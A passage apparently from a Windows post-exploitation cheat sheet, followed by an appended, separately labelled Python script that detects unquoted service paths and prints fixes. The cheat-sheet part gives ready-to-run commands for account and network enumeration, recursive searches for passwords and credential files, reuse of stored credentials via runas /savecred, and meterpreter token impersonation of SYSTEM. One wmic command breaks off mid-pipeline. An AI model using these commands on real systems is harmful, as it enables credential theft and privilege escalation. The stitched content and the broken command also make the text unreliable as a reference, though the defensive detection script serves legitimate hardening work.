net users
net localgroup
net localgroup Administrators
net user hax0r   #Check local and domain
net user hax0r /domain
net group Administrators /domain
Network information/connections
ipconfig /all
route print
arp -a
netstat -ano
Search tips
#FindStr
findstr /spin "password" *.*   //Recursive, case-insensitive string scan with line numbers
#Dir
dir /a-r-d /s /b   //List directories without the read-only attribute (rough check for writeable directories)
dir secret.txt /s /p   //Search for secret.txt recursively from the current folder
dir /s *pass*==*cred*==*vnc*==*.config*   //Search for file names containing certain words
Privilege Escalation
Stored Credential
cmdkey /list   //Check whether any stored credentials exist
runas /user:administrator /savecred "cmd.exe /k whoami"   //Use them
Impersonating Tokens with meterpreter
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
Unquoted Path
#Obtain the path of the executable called by each Windows service
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
#Default search
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v
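As an added, defender-side example (not from the original cheat sheet), this Python script parses the kind of `sc qc` output the one-liner above collects, flags services whose BINARY_PATH_NAME is unquoted and contains spaces, and emits the `sc config ... binPath=` command that quotes the executable; the service names and paths are constructed samples, not captured from a real host.

```python
import re

# Constructed sample of concatenated `sc qc <name>` output (not from a real host).
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GoodSvc
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Good Vendor\good.exe" -svc

SERVICE_NAME: RiskySvc
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Risky Vendor\risky.exe /run

SERVICE_NAME: SysSvc
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
"""


def parse_sc_qc(text):
    """Map SERVICE_NAME -> BINARY_PATH_NAME from concatenated `sc qc` output."""
    services, current = {}, None
    for line in text.splitlines():
        m = re.match(r"\s*SERVICE_NAME:\s*(\S+)", line)
        if m:
            current = m.group(1)
            continue
        m = re.match(r"\s*BINARY_PATH_NAME\s*:\s*(.*\S)", line)
        if m and current:
            services[current] = m.group(1)
    return services


def executable_part(binpath):
    """Executable portion of an unquoted command line (up to and including .exe)."""
    m = re.match(r"(.*?\.exe)", binpath, re.IGNORECASE)
    return m.group(1) if m else binpath.split()[0]


def is_unquoted_with_spaces(binpath):
    """True when the path is not quoted and its executable part contains a space."""
    return not binpath.startswith('"') and " " in executable_part(binpath)


def fix_command(name, binpath):
    """Remediation: quote the executable with `sc config <name> binPath= ...`."""
    exe = executable_part(binpath)
    return f'sc config {name} binPath= "\\"{exe}\\"{binpath[len(exe):]}"'


def find_unquoted(text):
    """Return {service: binpath} for every unquoted-with-spaces service path."""
    return {n: p for n, p in parse_sc_qc(text).items() if is_unquoted_with_spaces(p)}


if __name__ == "__main__":
    for name, path in find_unquoted(SAMPLE_SC_QC).items():
        print(f"{name}: {path}\n  remediate: {fix_command(name, path)}")
```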